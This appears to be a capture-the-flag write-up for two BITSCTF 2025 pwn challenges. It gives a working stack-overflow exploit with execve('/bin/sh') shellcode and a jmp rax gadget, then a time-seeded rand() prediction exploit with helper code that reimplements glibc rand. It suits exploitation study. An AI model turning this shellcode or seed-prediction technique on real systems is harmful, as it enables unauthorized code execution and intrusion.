BITSCTF 2025 - PWN challenges

Introduction

There were only two problems that we managed to solve. They were very similar, just like in other competitions.

Baby PWN

A simple stack-based task: there is no canary and the stack is executable, so we can place shellcode in the overflowed buffer and redirect the return address to it.

Checking:

#checksec --file=./main 
[*] 
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

Solution:


from pwn import *             

context.update(arch='x86_64', os='linux') 
context.terminal = ['wt.exe','wsl.exe'] 

HOST="nc 20.244.40.210 6001"
ADDRESS,PORT=HOST.split()[1:]

BINARY_NAME="./main"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

if args.REMOTE:
    p = remote(ADDRESS,PORT)
else:
    p = process(binary.path)    

length=112+8   # 112-byte buffer + 8 bytes of saved rbp before the return address

# 27-byte execve("/bin/sh") shellcode with no NUL or newline bytes:
# "/bin/sh\0" is loaded as a negated imm64 and restored with `neg rbx`
shellcode=b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
# `jmp rax` gadget (binary is not PIE, so the address is fixed); the exploit relies on
# rax still pointing at the start of our buffer when the vulnerable function returns
jmp_rax=0x00000000004010ac

# shellcode first, padding up to the saved return address, then the gadget
payload=shellcode+(length-len(shellcode))*b'A'+p64(jmp_rax)
p.sendline(payload)
p.interactive()

Flag: BITSCTF{w3lc0m3_70_7h3_w0rld_0f_b1n4ry_3xpl01t4t10n_ec5d9205}
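As an added example (not part of the original writeup), the Python below shows why that particular shellcode survives a sendline()/gets()-style read: it decodes the NUL-free immediate that `neg rbx` turns back into "/bin/sh", checks the payload for bytes that would cut the input short, and assembles the same 128-byte layout with plain struct instead of pwntools. The offset, gadget address and shellcode bytes are taken from the exploit above; the bad-byte set and the helper names are my own assumptions.

```python
import struct

# Values taken from the exploit above (the binary is not PIE, so the gadget address is fixed).
SHELLCODE = bytes.fromhex("31c048bbd19d9691d08c97ff48f7db535457995257545eb03b0f05")
JMP_RAX = 0x4010AC          # `jmp rax` gadget
OFFSET = 112 + 8            # 112-byte buffer + saved rbp

MASK64 = (1 << 64) - 1


def neg_encode(s: bytes) -> int:
    """64-bit two's-complement negation of a <=8-byte little-endian string.
    The shellcode loads this NUL-free value with `mov rbx, imm64` and restores
    the real bytes with `neg rbx`, so no NUL appears in the instruction stream."""
    if len(s) > 8:
        raise ValueError("string must fit in one 64-bit register")
    value = int.from_bytes(s.ljust(8, b"\x00"), "little")
    return (-value) & MASK64


def neg_decode(imm: int) -> bytes:
    """Inverse of neg_encode: what `neg rbx` leaves in the register."""
    return ((-imm) & MASK64).to_bytes(8, "little")


def shellcode_string(sc: bytes = SHELLCODE) -> bytes:
    """Locate the `mov rbx, imm64` (48 bb ...) and decode its immediate."""
    pos = sc.index(b"\x48\xbb")
    imm = int.from_bytes(sc[pos + 2:pos + 10], "little")
    return neg_decode(imm)


def bad_byte_positions(data: bytes, bad: bytes = b"\x00\x0a") -> list:
    """Offsets of bytes that would cut the input short (assumed bad-byte set):
    NUL for str*-style copies, newline because sendline()/gets() end on it."""
    return [i for i, b in enumerate(data) if b in bad]


def build_payload(shellcode: bytes = SHELLCODE, offset: int = OFFSET,
                  ret_addr: int = JMP_RAX) -> bytes:
    """Shellcode at the start of the buffer, padding up to the saved return
    address, then the gadget address as 8 little-endian bytes."""
    if len(shellcode) > offset:
        raise ValueError("shellcode does not fit before the return address")
    if bad_byte_positions(shellcode):
        raise ValueError("shellcode contains NUL/newline bytes")
    payload = shellcode + b"A" * (offset - len(shellcode)) + struct.pack("<Q", ret_addr)
    # Only a newline is fatal for the whole line: the packed address legitimately
    # has NUL bytes in its upper half, and a read that stops only at '\n' keeps them.
    if b"\n" in payload:
        raise ValueError("payload contains a newline")
    return payload


if __name__ == "__main__":
    print(shellcode_string())                  # b'/bin/sh\x00'
    print(hex(neg_encode(b"/bin/sh")))         # 0xff978cd091969dd1
    payload = build_payload()
    print(len(payload), payload[-8:].hex())    # 128 ac10400000000000
```

The same helpers are what you reach for when the challenge changes the input routine: swap the bad-byte set for whatever terminates the read, re-check the shellcode, and rebuild the layout.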

Biscuits

This task was almost identical to Mr Unlucky from Nullcon Goa HackIM 2025 CTF: the program seeds rand() with the current time and makes you guess every value it draws. The only differences were that instead of characters there were cookie names, there were more of them, and some contain non-ASCII bytes (Polvor\xc3\xb3n is the UTF-8 encoding of Polvorón), so they have to be sent as exact byte strings.

Checking:

    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    SHSTK:      Enabled
    IBT:        Enabled
    Stripped:   No

All mitigations are enabled, which does not matter here: the weakness is the predictable rand() seed, not memory corruption. We seed our own libc's rand() with the current time, reproduce the sequence of cookie indices and send the predicted names.

Solution:

from pwn import *             

import ctypes
import time

#context.log_level='debug'  
# Load the system libc so that srand()/rand() behave exactly as in the target
libc = ctypes.CDLL("libc.so.6")

context.update(arch='x86_64', os='linux') 
context.terminal = ['wt.exe','wsl.exe'] 

HOST="nc 20.244.40.210 6000"
ADDRESS,PORT=HOST.split()[1:]

BINARY_NAME="./main"
#BINARY_NAME="./mr_unlucky_0_sleep"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

if args.REMOTE:
    p = remote(ADDRESS,PORT)
else:
    p = process(binary.path)    

cookies= [b'Chocolate Chip', b'Sugar Cookie', b'Oatmeal Raisin', b'Peanut Butter', 
          b'Snickerdoodle', b'Shortbread', b'Gingerbread', b'Macaron', b'Macaroon', 
          b'Biscotti', b'Butter Cookie', b'White Chocolate Macadamia Nut', b'Double Chocolate Chip', 
          b'M&M Cookie', b'Lemon Drop Cookie', b'Coconut Cookie', b'Almond Cookie', 
          b'Thumbprint Cookie', b'Fortune Cookie', b'Black and White Cookie', b'Molasses Cookie', 
          b'Pumpkin Cookie', b'Maple Cookie', b'Espresso Cookie', b'Red Velvet Cookie', b'Funfetti Cookie', 
          b'S\'mores Cookie', b'Rocky Road Cookie', b'Caramel Apple Cookie', b'Banana Bread Cookie', 
          b'Zucchini Cookie', b'Matcha Green Tea Cookie', b'Chai Spice Cookie', b'Lavender Shortbread', 
          b'Earl Grey Tea Cookie', b'Pistachio Cookie', b'Hazelnut Cookie', b'Pecan Sandies', b'Linzer Cookie',
          b'Spritz Cookie', b'Russian Tea Cake', b'Anzac Biscuit', b'Florentine Cookie', b'Stroopwafel', 
          b'Alfajores', b'Polvor\xc3\xb3n', b'Springerle', b'Pfeffern\xc3\xbcsse', b'Speculoos', b'Kolaczki', b'Rugelach', 
          b'Hamantaschen', b'Mandelbrot', b'Koulourakia', b'Melomakarona', b'Kourabiedes', b'Pizzelle', b'Amaretti', 
          b'Cantucci', b'Savoiardi (Ladyfingers)', b'Madeleine', b'Palmier', b'Tuile', b'Langue de Chat', 
          b'Viennese Whirls', b'Empire Biscuit', b'Jammie Dodger', b'Digestive Biscuit', b'Hobnob', b'Garibaldi Biscuit', 
          b'Bourbon Biscuit', b'Custard Cream', b'Ginger Nut', b'Nice Biscuit', b'Shortcake', b'Jam Thumbprint', 
          b'Coconut Macaroon', b'Chocolate Crinkle', b'Pepparkakor', b'Sandbakelse', b'Krumkake', b'Rosette Cookie',
          b'Pinwheel Cookie', b'Checkerboard Cookie', b'Rainbow Cookie', b'Mexican Wedding Cookie', 
          b'Snowball Cookie', b'Cranberry Orange Cookie', b'Pumpkin Spice Cookie', b'Cinnamon Roll Cookie', 
          b'Chocolate Hazelnut Cookie', b'Salted Caramel Cookie', 
          b'Toffee Crunch Cookie', b'Brownie Cookie', b'Cheesecake Cookie', b'Key Lime Cookie', b'Blueberry Lemon Cookie', b'Raspberry Almond Cookie', b'Strawberry Shortcake Cookie', b'Neapolitan Cookie']

def predict_cookies_from_timestamp(timestamp, count=100):
    libc.srand(ctypes.c_uint(timestamp))  # seed exactly like the target: srand(time(NULL))
    cookie_sequence = []
    for _ in range(count):
        cookie_index = libc.rand() % len(cookies)   # the target draws cookies[rand() % 100]
        cookie_sequence.append(cookies[cookie_index])
    print(cookie_sequence)
    return cookie_sequence


current_time = int(time.time())
predicted_cookies=predict_cookies_from_timestamp(current_time)    

#p.recvuntil(b'Guess the cookie:',timeout=3)

for i,cookie in enumerate(predicted_cookies):
    p.clean()
    p.sendline(cookie)
    recv = b''
    try:
        recv = p.recv(timeout=3)   # b'' on timeout, EOFError if the server hung up
    except EOFError:
        print("connection closed")
        break
    if b'Wrong' in recv:
        # our time() and the server's differed by a second or so: reconnect and retry
        print("wrong cookie predicted")
        break
    warn(f"Attempt: {i}")
    #time.sleep(0.3)
    
p.interactive()

Flag: BITSCTF{7h4nk5_f0r_4ll_0f_th3_c00ki3s_1_r34lly_enjoy3d_th3m_d31fa51e}
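The exploit above calls the local libc through ctypes, so it only reproduces the server's sequence where libc.so.6 is glibc. As an added example that is not part of the original writeup, the block below reimplements glibc's srand()/rand() in pure Python (the default TYPE_3 additive feedback generator, including the 310 discarded warm-up outputs), predicts the cookie sequence from a timestamp the same way the exploit does, and enumerates nearby seeds to cover clock skew between us and the server. The eight-entry cookie list is a constructed sample (the first names from the list above; the real draw uses rand() % 100 over the full list), and the helper names are mine.

```python
import time

# Constructed sample: the first eight names from the exploit's list. The real
# exploit uses all 100 names, and rand() % len(cookies) depends on that length,
# so substitute the full list when predicting against the server.
SAMPLE_COOKIES = [
    b"Chocolate Chip", b"Sugar Cookie", b"Oatmeal Raisin", b"Peanut Butter",
    b"Snickerdoodle", b"Shortbread", b"Gingerbread", b"Macaron",
]


def glibc_rand_sequence(seed: int, n: int) -> list:
    """First n outputs of glibc rand() after srand(seed), without calling libc.

    glibc's default generator (TYPE_3) fills a 31-word state with a Park-Miller
    LCG (x = 16807*x mod 2^31-1), then runs the additive step
    r[i] = r[i-3] + r[i-31] (mod 2^32), discards the first 310 outputs and
    returns each later word shifted right by one.
    """
    seed &= 0xFFFFFFFF
    if seed == 0:            # glibc substitutes 1 for a zero seed
        seed = 1
    if seed & 0x80000000:    # the state is int32_t, so large seeds go negative
        seed -= 1 << 32
    r = [0] * (344 + n)
    r[0] = seed
    for i in range(1, 31):
        r[i] = (16807 * r[i - 1]) % 2147483647
    for i in range(31, 34):
        r[i] = r[i - 31]
    for i in range(34, 344):              # warm-up, results discarded
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
    out = []
    for i in range(344, 344 + n):
        r[i] = (r[i - 31] + r[i - 3]) & 0xFFFFFFFF
        out.append(r[i] >> 1)
    return out


def predict_cookies(seed: int, cookies: list, count: int) -> list:
    """The target's draw: cookies[rand() % len(cookies)] for each round."""
    return [cookies[v % len(cookies)] for v in glibc_rand_sequence(seed, count)]


def candidate_seeds(now: int = None, skew: int = 2) -> list:
    """time(NULL) on the server may differ from ours by a second or two
    (latency, clock drift); return the nearest seeds first."""
    if now is None:
        now = int(time.time())
    return sorted(range(now - skew, now + skew + 1), key=lambda s: abs(s - now))


if __name__ == "__main__":
    # srand(1) is the classic check: glibc prints 1804289383, 846930886, ...
    print(glibc_rand_sequence(1, 5))
    for seed in candidate_seeds(skew=1):
        print(seed, predict_cookies(seed, SAMPLE_COOKIES, 5))
```

Each reconnect gives the server a fresh time-based seed, and one wrong guess ends the round, so the practical loop is: connect, predict with the closest candidate seed, and on "Wrong" reconnect and move to the next offset in the list.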